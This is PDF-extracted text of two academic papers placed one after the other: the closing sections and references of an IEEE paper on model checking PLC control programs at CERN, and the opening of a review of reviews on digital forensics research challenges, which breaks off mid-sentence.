fundamental limitation of all veri cation methodologies lies in the fact that requirements to be satis ed by the system are usually expressed informally. Moreover, they may be inconsis-tent [34] or fail to re ect the precise behavior expected by the designers [35]. To address this problem, we have de ned a set of easy-to-use requirement patterns [33]. Our approach is sim- ilar to the one widely adopted in the industry, where simpli ed formal languages are used by developers to de ne requirements[36] [38]. The second limitation comes from the correctness of the model-checking tools and of the result interpretation by thedevelopers. Although several model checkers are used in a variety of projects, none of the well-established model check- ers have been formally veri ed themselves. Furthermore, mostpractical veri cation methodologies involve abstraction, lead- ing to the possibility of spurious counterexamples. As with compilation warnings, developers tend to dismiss counterex-amples as spurious, whenever they cannot be easily con rmed. Although the latter problem can be partially addressed by mak- ing counterexample analysis part of the automated process (e.g.,[18]), the former is likely to persist. Thus, model checking can- not be the sole basis for system certi cation. However, we have shown that many bugs can be identi ed by formal veri ca- tion, which escape the usual testing procedures, considerably increasing the con dence one can put into industrial controlapplications. A mathematically sound correctness proof requires the estab- lishment of formal semantics for all involved languages. Usingoperational semantics for the model checker languages, our intermediate representation (cf., [3]) and the languages of the IEC 61131-3 standard (cf., [39] for IL and FBD), we can estab-lish a simulation relation between the original and transformed models: states in the original model are related with semanti- cally equivalent states in the transformed model. The simulationrelation must preserve the properties to be veri ed (the choice of the employed abstractions in uences the classes of proper- ties that are preserved [27]). One such complete proof of thecorrectness of abstraction rules that we used can be found in [5]. VII. C ONCLUSION AND FUTURE WORK We have presented a general automated methodology for for- mal veri cation of PLC programs. The methodology is based on an IM, used as a pivot between all the PLC and formalmodeling languages that we use. This approach potentially cov- ers all PLC languages. Current implementation supports SCL and SFC; the support for IL is under development. The IM model is automatically reduced, following which models for different veri cation tools are automatically generated. Thisallows us to bene t from the combined strengths of the dif- ferent veri cation tools. Current implementation allows the generation of nuXmv, UPPAAL, and BIP models. We have pre-sented the most relevant transformation rules from SCL and SFC to IM. The reduction and abstraction techniques presented in this paper are applied to the IM. On one hand, this makesthem independent from the source language, allowing veri - cation of heterogeneous PLC applications. On the other hand, this approach decouples these techniques from the choice ofthe model checker, allowing greater exibility and coherence of veri cation results. Finally, we have applied the presented methodology to real-life PLC control systems developed atCERN, demonstrating the feasibility of our approach. Formal veri cation using the presented methodology has allowed us to identify bugs in these systems, which have escaped the standard testing procedures. There are two main directions for the future work on this project. First is the improvement of the speci cation methods for control systems. Such a language must be formal, unam- biguous, and easy-to-understand. Second is the improvementof the abstraction techniques with the goal of automatizing the variable abstraction. R EFERENCES [1] Functional Safety of Electrical/Electronic/Programmable Electronic Safety-Related Systems , IEC Standard 61508, 2010. [2] B. Fern ndez Adiego, E. Blanco Vi uela, J.-C. Tournier, V . M. Gonz lez Su rez, and S. Bliudze, Model-based automated testing of critical PLCprograms, in Proc. 11th IEEE Int. Conf. Ind. Informat. , 2013, pp. 722 727. [3] B. Fern ndez Adiego, D. Darvas, J.-C. Tournier, E. Blanco Vi uela, J. O. Blech, and V . M. Gonz lez Su rez, Automated generation offormal models from ST control programs for veri cation purposes, CERN, Geneva, Switzerland, Internal Note CERN-ACC-NOTE-2014- 0037, 2014 [Online]. Available: http://cds.cern.ch/record/1708853/ les/Internal%20Note.pdf [4] D. Darvas, B. Fern ndez Adiego, A. V r s, T. Bartha, E. Blanco Vi uela, and V . M. Gonz lez Su rez, Formal veri cation of complex properties on PLC programs, in F ormal Techniques for Distributed Objects, Components, and Systems . New York, NY , USA: Springer, 2014, pp. 284 299. [5] B. Fern ndez Adiego, D. Darvas, E. Blanco Vi uela, J.-C. Tournier, V . M. Gonz lez Su rez, and J. O. Blech, Modelling and formal veri -cation of timing aspects in large PLC programs, in Proc. 19th Int. Fed. Autom. Control World Congr . , 2014, pp. 3333 3339. [6] G. Frey and L. Litz, Formal methods in PLC programming, in Proc. IEEE Int. Conf. Syst. Man Cybern. , 2000, vol. 4, pp. 2431 2436. [7] A. Mader and H. Wupper, Timed automaton models for simple pro- grammable logic controllers, in Proc. IEEE 11th Euromicro Conf. Real-Time Syst. , 1999, pp. 106 113. [8] A. S l ow and R. Drechsler, Veri cation of PLC programs using for- mal proof techniques, in F ormal Methods for Automation and Safety in Railway and Automotive Systems . Budapest, Hungary: L Harmattan, 2008, pp. 43 50. [9] D. Soliman, K. Thramboulidis, and G. Frey, Transformation of function block diagrams to UPPAAL timed automata for the veri cation of safety applications, Annu. Rev. Control , vol. 36, no. 2, pp. 338 345, 2012. [10] M. Perin and J.-M. Faure, Building meaningful timed models of closed- loop DES for veri cation purposes, Control Eng. Practice , vol. 21, no. 11, pp. 1620 1639, 2013. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:42:56 UTC from IEEE Xplore. Restrictions apply. 1410 IEEE TRANSACTIONS ON INDUSTRIAL INFORMATICS, VOL. 11, NO. 6, DECEMBER 2015 [11] H. B. Mokadem, B. B rard, V . Gourcuff, O. De Smet, and J.-M. Roussel, Veri cation of a timed multitask system with UPPAAL, IEEE Trans. Autom. Sci. Eng. , vol. 7, no. 4, pp. 921 932, Oct. 2010. [12] C. A. Sarmento, J. R. Silva, P. E. Miyagi, and D. J. Santos Filho, Modeling of programs and its veri cation for programmable logic con- trollers, in Proc. 17th Int. Fed. Autom. Control World Congr . , 2008, pp. 10 546 10 551. [13] O. Pavlovi c and H.-D. Ehrich, Model checking PLC software written in function block diagram, in Proc. Int. Conf. Softw. Test. V erif. V alid. , 2010, pp. 439 448. [14] D. Soliman and G. Frey, Veri cation and validation of safety applica- tions based on PLCopen safety function blocks, Control Eng. Pract. , vol. 19, no. 9, pp. 929 946, 2011. [15] G. Canet, S. Couf n, J.-J. Lesage, A. Petit, and P. Schnoebelen, Towards the automatic veri cation of PLC programs written in instruction list, inProc. IEEE Int. Conf. Syst. Man Cybern. , 2000, vol. 4, pp. 2449 2454. [16] T. Bartha, A. V r s, A. J mbor, and D. Darvas, Veri cation of an indus- trial safety function using coloured Petri nets and model checking, inProc. 14th Int. Conf. Mod. Inf. Technol. Innov. Processes Ind. Entrep. (MITIP) , 2012, pp. 472 485. [17] N. Bauer et al. , Veri cation of PLC programs given as sequential function charts, in Integration of Software Speci cation Techniques for Applications in Engineering . New York, NY , USA: Springer, 2004, pp. 517 540. [18] S. Biallas, J. Brauer, and S. Kowalewski, Counterexample-guided abstraction re nement for PLCs, in Proc. 5th Int. Conf. Syst. Softw. , 2010, pp. 10 18. [19] J. Yoo, S. Cha, and E. Jee, A veri cation framework for FBD based software in nuclear power plants, in Proc. 15th Asia-Pac. Softw. Eng. Conf. , 2008, pp. 385 392. [20] R. Gl ck and F. Krebs, Towards interactive veri cation of programmable logic controllers using modal Kleene algebra and KIV, in Relational and Algebraic Methods in Computer Science . New York, NY , USA: Springer, 2015, pp. 241 256. [21] J. Sadolewski, Conversion of ST control programs to ANSI C for veri cation purposes, e-Informatica , vol. 5, no. 1, pp. 65 76, 2011. [22] V . Gourcuff, O. de Smet, and J.-M. Faure, Improving large-sized PLC programs veri cation using abstractions, in Proc. 17th Int. Fed. Autom. Control World Congr . , 2008, pp. 5101 5106. [23] T. Lange, M. R. Neuh u er, and T. Noll, Speeding up the safety veri ca- tion of programmable logic controller code, in Hardware and Software: V eri cation and Testing . New York, NY , USA: Springer, 2013, pp. 44 60. [24] J. Nellen, E. brah m, and B. Wolters, A CEGAR tool for the reach- ability analysis of PLC-controlled plants using hybrid automata, inF ormalisms for Reuse and Systems Integration . New York, NY , USA, 2015, pp. 55 78. [25] E. Kuzmin and V . Sokolov, Modeling, speci cation and construction of PLC-programs, Autom. Control Comput. Sci. , vol. 48, no. 7, pp. 554 563, 2014. [26] T. Ovatman, A. Aral, D. Polat, and A. O. nver, An overview of model checking practices on veri cation of PLC software, Softw. Syst. Model. , 2014, doi: 10.1007/s10270-014-0448-7. [27] M. Bozga, S. Graf, L. Mounier, and I. Ober, Modeling and veri cation of real time systems using the IF toolbox, in Real Time Systems 1: Modeling and V eri cation Techniques . Cachan, France: Hermes/Lavoisier, 2008, vol. 1, ch. 9. [28] M. Bozga, S. Graf, L. Mounier, and I. Ober, IF validation environment tutorial, in Model Checking Software . New York, NY , USA: Springer, 2004, pp. 306 307. [29] Programmable controllers , IEC Standard 61131, 2013.[30] Siemens, SIMATIC Programming With STEP7 Manual , 2010, A5E02789666-01 [Online]. Available: https://support.industry.siemens. com/cs/document/45531107/simatic-programming-with-step-7-v55 [31] Siemens, Standards Compliance According to IEC 61131-3 , 2011 [Online]. Available: http://support.automation.siemens.com/WW/view/ en/50204938 [32] R. Cavada et al. , The nuXmv symbolic model checker, in Computer Aided V eri cation . New York, NY , USA: Springer, 2014, pp. 334 342. [33] B. Fern ndez Adiego, D. Darvas, J.-C. Tournier, E. Blanco Vi uela, and V . M. Gonz lez Su rez, Bringing automated model checking to PLCprogram development A CERN case study, in Proc. 12th Int. Workshop Discr . Event Syst. , 2014, pp. 394 399. [34] R. Alur et al. , Formal speci cations and analysis of the computer- assisted resuscitation algorithm (CARA) infusion pump control system, Int. J. Softw. Tools Technol. Transfer , vol. 5, no. 4, pp. 308 319, 2004. [35] G. Klein et al. , seL4: Formal veri cation of an OS kernel, inProc. ACM SIGOPS 22nd Symp. Oper . Syst. Principles , 2009, pp. 207 220. [36] M. Dwyer, G. Avrunin, and J. Corbett, Patterns in property speci cations for nite-state veri cation, in Proc. 21st Int. Conf. Softw. Eng. , 1999, pp. 411 420. [37] I. Beer, S. Ben-David, C. Eisner, D. Fisman, A. Gringauze, and Y . Rodeh, The temporal logic Sugar, in Computer Aided V eri cation .N e wY o r k , NY , USA: Springer, 2001, pp. 363 367. [38] R. Armoni et al. , The ForSpec temporal logic: A new temporal property- speci cation language, in Tools and Algorithms for the Construction and Analysis of Systems . New York, NY , USA: Springer, 2002, pp. 296 311. [39] J. O. Blech and S. O. Biha, Veri cation of PLC properties based on formal semantics in Coq, in Software Engineering and F ormal Methods . New York, NY , USA: Springer, 2011, pp. 58 73. Borja Fern ndez Adiego , photograph and biography not available at the time of publication. D niel Darvas , photograph and biography not available at the time of publication. Enrique Blanco Vi uela , photograph and biography not available at the time of publication. Jean-Charles Tournier , (M 09) photograph and biography not available at the time of publication. Simon Bliudze , photograph and biography not available at the time of publication. Jan Olaf Blech , (M 05) photograph and biography not available at the time of publication. V ctor Manuel Gonz lez Su rez , photograph and biography not available at the time of publication. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:42:56 UTC from IEEE Xplore. Restrictions apply.
1400 IEEE TRANSACTIONS ON INDUSTRIAL INFORMATICS, VOL. 11, NO. 6, DECEMBER 2015 Applying Model Checking to Industrial-Sized PLC Programs Borja Fern ndez Adiego, D niel Darvas, Enrique Blanco Vi uela, Jean-Charles Tournier, Member , IEEE , Simon Bliudze, Jan Olaf Blech, Member , IEEE , and V ctor Manuel Gonz lez Su rez
Research_Trends_Challenges_and_Emerging_Topics_in_Digital_Forensics_A_Review_of_Reviews.pdf
Due to its critical role in cybersecurity, digital forensics has received signi cant attention from researchers and practitioners alike. The ever increasing sophistication of modern cyberattacks is directly related to the complexity of evidence acquisition, which often requires the use of several technologies. To date, researchers have presented many surveys and reviews on the eld. However, such articles focused on the advances of each particular domain of digital forensics individually. Therefore, while each of these surveys facilitates researchers and practitioners to keep up with the latest advances in a particular domain of digital forensics, the global perspective is missing. Aiming to ll this gap, we performed a qualitative review of all the relevant reviews in the eld of digital forensics, determined the main topics on digital forensics topics and identi ed their main challenges. Despite the diversity of topics and methods, there are several common problems that are faced by almost all of them, with most of them residing in evidence acquisition and pre-processing due to counter analysis methods and dif culties of collecting data from devices, the cloud etc. Beyond pure technical issues, our study highlights procedural issues in terms of readiness, reporting and presentation, as well as ethics, highlighting the European perspective which is traditionally stricter in terms of privacy. Our extensive analysis paves the way for closer collaboration among researcher and practitioners among different topics of digital forensics.
Received January 22, 2022, accepted February 16, 2022, date of publication February 24, 2022, date of current version March 10, 2022. Digital Object Identifier 10.1 109/ACCESS.2022.3154059 Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews FRAN CASINO 1,2, (Member, IEEE), THOMAS K. DASAKLIS3, GEORGIOS P. SPATHOULAS 4, MARIOS ANAGNOSTOPOULOS 5, AMRITA GHOSAL 6, ISTV N BO ROCZ7, AGUSTI SOLANAS 1, (Senior Member, IEEE), MAURO CONTI 8,9, (Fellow, IEEE), AND CONSTANTINOS PATSAKIS 2,10 1Department of Computer Engineering and Mathematics, Universitat Rovira i Virgili, 43007 Tarragona, Spain 2Information Management Systems Institute, Athena Research Center, 151 25 Marousi, Greece 3Hellenic Open University, 570 01 Patras, Greece 4Norwegian University of Science and Technology (NTNU), 2802 Gj vik, Norway 5Aalborg University, 9220 Copenhagen, Denmark 6CONFIRM Centre, University of Limerick, Limerick, V94 T9PX Ireland 7Vrije Universiteit Brussel, 1050 Brussels, Belgium 8Department of Mathematics, University of Padua, 35122 Padua, Italy 9Faculty of Electrical Engineering, Mathematics and Computer Science, Delft University of Technology, 2628 CD Delft, The Netherlands 10Department of Informatics, University of Piraeus, 185 34 Piraeus, Greece Corresponding author: Constantinos Patsakis ([email protected]) This work was supported in part by the European Commission under the Horizon 2020 Programme (H2020), as part of the projects LOCARD under Grant 832735, HEROES under Grant 101021801, and the CyberSec4Europe under Grant 830929; and in part by the European Commission (call ISFP-2020-AG-TERFIN) as part of the CTC Project under Grant 830929. The work of Fran Casino was supported by the Beatriu de Pin s programme of the Government of Catalonia under Grant 2020 BP 00035. INDEX TERMS Digital forensics, cybersecurity, review of reviews, forensic investigations, meta review. I. INTRODUCTION According to Edmond Locard's exchange principle, in every crime, the perpetrator will alter the crime scene by bringing something and leaving something else [1], [2]. Therefore, these changes can be used as forensic evidence. While this The associate editor coordinating the review of this manuscript and approving it for publication was Ilsun You .principle is relatively straightforward, it is dif cult in many cases to apply. This is why Locard introduced forensics labs in Law Enforcement Agencies (LEAs) over the rst decade of the 20th century [3]. While procedures that resemble digital forensics are men- tioned in computer science literature quite early, the domain was not fully de ned until 1980s when it started to gain attention. The introduction of the IBM PC generalised the 25464This work is licensed under a Creative Commons Attribution 4.0 License. For more information, see https://creativecommons.org/licenses/by/4.0/VOLUME 10, 2022 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews use of computing machines; thus, more interest was focused on digital evidence and many people came together and cre- ated a digital forensics community, which eventually became more formal in 1993 when the FBI hosted the First Interna- tional Conference on Computer Evidence [4]. Initially, the main activity was examining standalone computers to recover deleted or destroyed les from the disks. However, since the early 2000s, the digital forensics domain has expanded steadily, maturing along with regulations [5], [6]. Nowadays, users tend to utilise multiple digital devices and access tenths of digital services per day [7], [8]. The digital footprint of our everyday life has become enormous, and accordingly the probability that illegal activities leave digital evidence behind is very high. The need for forensic investigators has increased, and this have led to multiple academic education and certi cation programs related to digital forensics [9]. Additionally, the complexity of the tasks to be carried out and the required compliance with law and courts' regulations has led to the establishment of strict protocols and proce- dures to be followed [10][12]. The continuous appearance of new forms of cybercrime also requires adaptive investigation process models, new technology, and advanced techniques to deal with such incidents [13][15]. Beyond the rise of cybercrime, where the evidence is expected to be digital, digital evidence is underpinning almost all modern crime scenes. For instance, mobile devices have become a primary source of digital evidence as almost all our communications are performed through them [6]. In fact, according to EU,1the bulk of criminal investigations (85%) involve electronic evidence. Thus, emails, cloud service providers, online payments, and wearable devices are often used to extract digital evidence in various circumstances. A. MOTIVATION Digital evidence has become a norm and underpins most modern crime investigations. However, there are digital evi- dence to which different methods and methodologies apply. Some principles may remain the same; however, they cannot be applied to all types of evidence. For instance, collect- ing evidence from the Cloud bears no resemblance to IoT forensics or image forensics. This has led to a huge amount of research, which addresses the challenges raised in each domain individually, with the bulk of the work devoted to the development of novel tools and algorithms to extract digital evidence and intelligence from heterogeneous sources. Currently, investigators devote many efforts to provide a systematic overview of the literature and the advances in each domain, with focused surveys and reviews. Despite the importance of these surveys, an analysis considering the chal- lenges and issues of the different digital forensics domains as a whole is still missing. In other words, each of these surveys is focused on a speci c domain and, as a result, common issues, challenges and methods are not identi ed. 1https://ec.europa.eu/commission/presscorner/detail/en/MEMO_18_ 3345Moreover, research directions and approaches, that could be applied in several domains, remain explored in a topic- wise manner, lacking interoperability, and denoting a lack of collaboration between researchers in different forensics domains. We sustain that the above is a serious gap in current literature, and we aim to ll it in this article. To this end, we present a review of reviews in the eld of digital forensics. B. CONTRIBUTION According to a thorough methodological research, we collect all relevant surveys and reviews in the eld of digital foren- sics, analyse them, and answer a set of research questions, listed in Table 1, by performing the following actionsV Analysing the current state of the art and practice, and identifying the challenges of each domain individually. Assessing whether the current state of the art is aligned with the technological evolution in digital forensics. Using the previously collected information to identify common issues, gaps, best strategies and key focus areas in digital forensics, trying to span across different domains. Assessing technological advances to highlight emerging challenges in digital forensics. In addition to suggesting promising research lines in the eld based on the above analysis, we cover other dimensions of digital forensics, including frameworks and process mod- els, standardisation, readability and reporting, as well as legal and ethical aspects. To the best of our knowledge, this is the rst review of reviews covering the state of the art in digital forensics and showcasing the actual state of practice from a global perspective. The remainder of the article is organized as follows: Section II details our research methodology, providing a descriptive analysis of the retrieved literature, which is then complemented with a taxonomy of digital forensics in Section III. Section IV analyses the current state of practice regarding forensic methodologies and their phases, standards, and ethics. Relevant open issues, trends, and further research lines are discussed in Section V. The article concludes in Section VIwith some nal remarks. II. RESEARCH METHODOLOGY In recent years, academic publishing has signi cantly increased both in terms of volume and speed. At the same time, new channels for publication, such as conference pro- ceedings, open archives and numerous scienti c journals, are rapidly expanding, thus allowing today's researchers to publish their work in a multitude of venues [16]. According to recent studies, approximately 22 new systematic reviews are published daily [17]. New methodological approaches for synthesising this evidence have been developed to keep up with the proliferation of systematic reviews across dis- ciplines. Besides, conducting reviews of existing systematic reviews has become a logical next step in providing evidence in domains where a growing number of systematic reviews is available. Overviews or umbrella reviews are most commonly VOLUME 10, 2022 25465 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews TABLE 1. Summary of research questions and the corresponding sections devoted to answer them. used to bring together, appraise, and synthesise the results of related systematic reviews when multiple systematic reviews on similar or related topics already exist [17], [18]. Therefore, a review of reviews or an umbrella review compiles evidence from multiple reviews or survey papers into a single docu- ment. Syntheses of previous systematic reviews are known by a variety of names, one of which is an umbrella review. Other descriptions include the terms (``review of reviews,'' ``sys- tematic review of reviews,'' ``review of systematic reviews,'' ``overviews of reviews,'' ``summary of systematic reviews,'' ``summary of reviews,'' and ``synthesis of reviews'') [19]. Despite their growing popularity, no standardized report- ing guidelines currently exist for umbrella reviews. How- ever, various multidisciplinary teams around the globe work together to develop relevant standardized reporting guidelines that will soon be available [20]. In our case, we rely upon an entirely systematic way to conduct our umbrella review. In particular, we have used various features of the approach presented in [21] to conduct our review of reviews and pro- vide a transparent, reproducible and sound overview of the scienti c literature on digital forensics from a global perspec- tive. Our review protocol consists of ve steps, as shown in Figure 1: 1) Planning the review 2) De ning research ques- tions 3) Searching literature databases 4) Applying inclusion and exclusion criteria and 5) Synthesising and reporting the results of the literature analysis. A. SEARCH STRATEGY As previously stated, our overall survey process is based on several prede ned research questions relevant to the dig- ital forensics literature. We conducted extensive research addressing the various technical/functional/security chal- lenges of the digital forensics literature guided by these research questions. To this end, we performed a systematic literature search without time constraints in May 2021 which was subsequently updated in November 2021. The main search engines used were Web of Science (WoS), Scopus and FIGURE 1. Detail of the research methodology steps. Google. Scopus and WoS were used to locate all scienti c- related literature due to their multidisciplinary coverage and scope [22], while Google was used to locate relevant stan- dards and best practices (grey literature). We queried Scopus and WoS using the terms ``digital forensics and review or survey'' in the title, keywords, and abstract of all articles. It is worth noting that rst bulk search query yielded 536 unique results (combining both sources). 25466 VOLUME 10, 2022 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews Electronic searches using Google also turned up relevant grey literature, such as unpublished research commissioned by governments or private/public institutions. In particular, we looked at the rst 200 Google results for the queries digital forensics and reviews anddigital forensics and surveys to nd the published grey literature. It is worth noting that we used Google searches as a supplement to our primary search strategy (especially for streamlining the assessment), and Scopus and WoS were our primary source for nding scienti c-related literature. Furthermore, compared to the bibliography retrieved from Scopus and WoS, the total num- ber of documents retrieved from Google was relatively low. We discovered additional studies using the so-called snowball effect (backward and forward), which involved searching the references of key articles and reports for addi- tional citations [23]. For instance, additional grey litera- ture was discovered by manually searching the reference lists in several reports, particularly research and committee reports or policy briefs from private and public sector institu- tions/organizations. For this study, we take into consideration 109 research papers and 51 reports. The 109 papers are used for identifying relevant challenges/trends across different dig- ital forensics domains (see Section III). The 51 reports were used to derive further insights about the state of practice regarding digital forensics methodologies, practices and stan- dards, as well as discussing future trends and open challenges from a policy perspective (see sections IVandV). B. SELECTION OF STUDIES We used various pre-de ned exclusion and inclusion crite- ria as described in Table 2to assess the eligibility of the retrieved literature; both academic and grey. Some exclu- sion criteria were used before introducing the literature into the bibliographic manager (language, subject area and doc- ument type restrictions). It is also worth noting that we have only examined review papers and reports written in English. Our overall selection process steps are the following: (i) We initially evaluated the relevance of the titles of all scienti c articles and reports. Articles/reports ful lling one of the exclusion criteria were removed from the analysis and sorted according to the reason for their removal, (ii) In the sequence, we evaluated the relevance of all paper abstracts and report introduction sections (grey literature). Articles and/or reports that met one of the de ned exclusion criteria were excluded from the analysis, and we documented the reason for exclusion, (iii) We also did a full-text reading, and some additional articles/reports were excluded and sorted by reason of exclusion during this step. We resolved any poten- tial disagreements among authors about the relevance of the retrieved articles/reports through discussion until reaching a unanimous consensus. We omitted several studies because they were not reviews or surveys (for example, papers rel- evant to nancial forensics investigation, business forensics). We also discarded from the analysis articles that did not meet the inclusion criteria.C. ANALYSIS AND REPORTING All articles and/or reports that met the inclusion criteria were analyzed (in emerging themes) using a qualitative analysis software (MAXQDA11). The authors carried out the the- matic content analysis independently. We applied various qualitative analysis methods (such as narrative synthesis and thematic analysis) to classify and synthesise the extracted data in a sound and comprehensive manner. The results of our analysis are presented in sections IIIandIV. D. BIBLIOGRAPHIC ANALYSIS In this section, we present a descriptive analysis of the scienti c papers included in the challenges-based and domain-speci c classi cation (see Figure 2). The descrip- tive analysis includes 109 research papers published from 2006 until the end of November 2021. The purpose of the descriptive analysis presented is three-foldV 1) It enhances the statistical description, aggregation, and presentation of the constructs of interest or their asso- ciations of the relevant literature (publications per year and domain etc.). 2) It contains insights to current research trends in the area of digital forensics and a critical discussion of the challenges identi ed. It, therefore, supports the classi- cation structure presented in Section III 3) It allows us to visually demonstrate the diverse research approaches used up to this point in the scienti c lit- erature regarding the proliferation of digital forensics review papers. The distribution of publications over time is depicted in Figure 2. In particular, Figure 2shows a year-by-year analysis of the selected papers. It is worth noting that the number of publications has increased signi cantly after 2017. Until the end of 2017, there were only about 38 review papers address- ing issues of digital forensics. However, from 2017 onwards, the number of reviews published in the scienti c literature has risen to nearly 70. As a result, over the last four years, research in the area of digital forensics has slowly but steadily increased. This upward trend re ects the key public and policy impact of digital forensics nowadays. Figure 2also shows the domain-speci c distribution of the 109 review papers included in our analysis. It is worth noting that we have identi ed seven (7) prevalent areas of research interest in digital forensics: Blockchain, Cloud, Filesystem and databases, Multimedia, IoT, Mobile, Networks. Multimedia forensics attracts most of the cur- rent digital forensics research (38 out of the 109 review papers), followed by Filesystem and database forensics papers (18 out of 109). Both streams justify that the widespread use of mobile devices with lower-cost storage and increased bandwidth has resulted in a massive generation of multimedia-related content. Furthermore, various miscella- neous review papers (applications that do not t into any of the above categories) demonstrate the digital forensics mul- tidisciplinary nature. These multidisciplinary review papers VOLUME 10, 2022 25467 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews TABLE 2. Selection criteria of the retrieved literature. FIGURE 2. Year-wise analysis of the selected literature per domain. represent research conducted in areas such as social media, smart grid, unmanned aerial vehicles and etc. III. TAXONOMY OF CHALLENGES-BASED DIGITAL FORENSICS RESEARCH In this section, we summarise the surveys/literature reviews collected following a rigorous statistical methodology based on the literature, as described in Section II. The topics of this classi cation have been systematically selected according to the contents of reviewed literature, and thus re ect the digital forensics research landscape and illustrates with high delity the heterogeneity of digital forensic solutions. The classi - cation of digital forensics topics is graphically represented in Figure 3. In each case, we discuss the main limitations and challenges proposed in the literature. More precisely, we extract the challenges at a research eld domain level (i.e., we group in a higher hierarchical level, when possible, the limitations of the methods presented in the surveys) to give a more comprehensive perspective and to enable further cross-topic comparisons in Section III-I.A. CLOUD Researchers, as well as government agencies, have thor- oughly explored many of the challenges in cloud forensics, though some challenges still remain to be addressed. For example, the diversity of embedded OSs with shorter product life cycles, as well as the numerous smartphone manufactur- ers around the world present, are challenges in this research area. In the literature, we can nd research works that have addressed challenges in cloud forensics and their solutions from different perspectives. Purnaye et al. [7] explored the different dimensions of cloud fornesics and categorised the main challenges of this topic. Alex et al. [24] discussed chal- lenges in cloud forensics related to data acquisition, logging, dependence on cloud service providers, chain of custody, crime scene reconstruction, cross border law and law presen- tation. Khanafseh et al. [25] pointed out several challenges in cloud forensics, such as the uni cation of logs format, miss- ing terms and conditions in Service Level Agreement (SLA) regarding investigations where service level agreement is the main point and condition between the user and the cloud 25468 VOLUME 10, 2022 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews FIGURE 3. Challenges-based and domain-specific mindmap abstraction of digital forensics topics identified in the literature. service provider, lack of forensics expertise, decreased access to forensic data and control over forensics data at all level from the customer side, lack of international collaboration and legislative mechanism in cross-nation data access and exchange, and lack of international collaboration and legisla- tive mechanism in cross-nation data access and exchange. Pichan et al. [26] considered the Digital Investigative Pro- cess (DIP) model [27] for describing the challenges emerging at each phase of the digital investigation process and pro- vided solutions for the respective identi ed challenges. The challenges identi ed by the authors in cloud forensics are unknown physical location, decentralized data, data dupli- cation, jurisdiction, encryption, preservation, dependence on CSP, chain of custody, evidence segregation, distributed stor- age, data volatility and integrity. Similar to the works of Khanafseh et al. and Pichan et al., the authors in [28] also identi ed the challenges in cloud forensics and ana- lyzed them on the basis of their signi cance. Park et al. [29] discussed the different challenges within cloud forensic investigations highlighting the relevance of proactive mod- els, and discussing the integration of smart environments to enhance the robustness of forensic investigations. The authors in [30] provided a categorization of the cloudforensic challenges based on the cloud forensic process stages. Amminezhad et al. [31] described the different chal- lenges in cloud forensics that were addressed by other authors by performing an exploratory analysis. Rahman et al. [32] broadly classi ed the existing challenges in cloud forensics, classifying the literature into three categories, namely, multi- tenancy, multi-location and scope of user control. Finally, the authors in [33] identi ed and discussed the major challenges that occur at each stage of the cloud forensic investigation, according to well-known forensic ows. As evident from the large number of publications in lit- erature reviews/surveys, cloud forensics is quite an explored research topic. Despite the considerable amount of research in cloud forensics, there still exist a number of chal- lenges/limitations that need much attention, as discussed by NIST [34]. In Table 3, we present a summary of the extracted challenges in the cloud forensic review/survey articles. From this summary, we observe that there is a dearth of research work focusing on cloud forensic stan- dard tools and technologies in the cloud environment. Also, very limited works have concentrated on pointing out the feasible solutions related to the challenges present in cloud forensics. VOLUME 10, 2022 25469 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews TABLE 3. High level extraction of limitations in cloud forensics. B. NETWORKS Data monitoring and acquisition from network traf c are mandatory to prevent most of nowadays cyber-attacks [36][38], including, but not limited to, Distributed Denial of Service (DDoS), phishing, DNS tunnelling, Man-in-the- middle (MitM) attacks, SQL injection and others [39], [40]. Regardless of the orchestration mechanism behind them (i.e., single attackers or orchestrated botnets), the analysis and mitigation mechanisms rely on the proper monitoring and analysis of computer network traf c to collect information, evidence and proof of any intrusion detection or vulnerabil- ity. For this purpose, several well-known tools exist, such as network forensic analysis tools which provide function- alities such as traf c snif ng, Intrusion Detection Systems (IDS), protocol analysis, and Security Event Management (SEM) [40][43]. Nevertheless, one of the challenges of network forensics is to achieve accurate and ef cient packet analysis in encrypted network traf c since it is far more chal- lenging than the analysis of unencrypted traf c. As authors stated in [40], [44], utilizing machine learning in packet analysis is evolving into a complex research eld that aims to address the analysis of unknown features and encrypted network data streams. Regarding the research and forensics-related surveys tack- ling such issues, several reviews recall the primary method- ologies and tools for network forensic analysis, such as the works seen in [36], [45], yet they were conducted almost a decade ago. Therefore, taxonomies classifying forensic frameworks suitable for Network Forensics are crucial [40]. An interesting review focusing on the attackers perspective, in terms of attack behaviour and plan identi cation, as well as prevention mechanisms, can be found in [46]. Finally, some protocol-oriented reviews, analyzing IEEE 802.11 protocol [43], and more recently, 5G networks [42], dis- cuss speci c vulnerabilities in their corresponding contexts. In general, the main challenges of network forensics, as iden- ti ed by the authors in the aforementioned works, are classi- ed in Table 4.TABLE 4. High level extraction of challenges in network forensics. C. MOBILE Smartphones and mobile devices may contain valuable infor- mation for a plethora of investigation purposes. Mobile foren- sics (MF) is a sub-branch within the digital forensics domain relevant to the extraction of digital evidence from portable and/or mobile devices. Mobile forensics processes could be broken down into the following three categories: seizure, acquisition, and examination/analysis. The diversity of embedded OSs with shorter product life cycles, as well as the numerous smartphone manufacturers around the world, stand out as signi cant challenges in the MF domain [47]. In general, MF presents various challenges due to a multitude of reasons. For example, in [48] the authors identify the following limitations for successfully carrying out MF investigations: 1) data-related issues (anonymity- enforced browsing and other anonymity services, and the considerable volume of data acquired during an investiga- tion) 2) forensic tools-related issues (MF research approaches have long focused on acquisition techniques, while minor importance was given to the other phases of MF investigative process) 3) device and operating systems diversity 4) security aspects (development of new and more sophisticated anti- forensic methods from the manufacturers) 5) cloud-related issues (current MF tools do not consider cloud aspects, cloud investigation barriers such as access to forensics data due to multi-jurisdictional legal frameworks, forensics data security) and 6) process automation. It is worth noting that MF faces signi cant challenges concerning the focus of the overall MF processes. For example, it is not clear whether investigation procedures should be model-speci c for each device or should be generic enough to form a standardized set of guidelines applicable to forensics procedures [49]. Another challenge is the need to perform live forensics (mobile 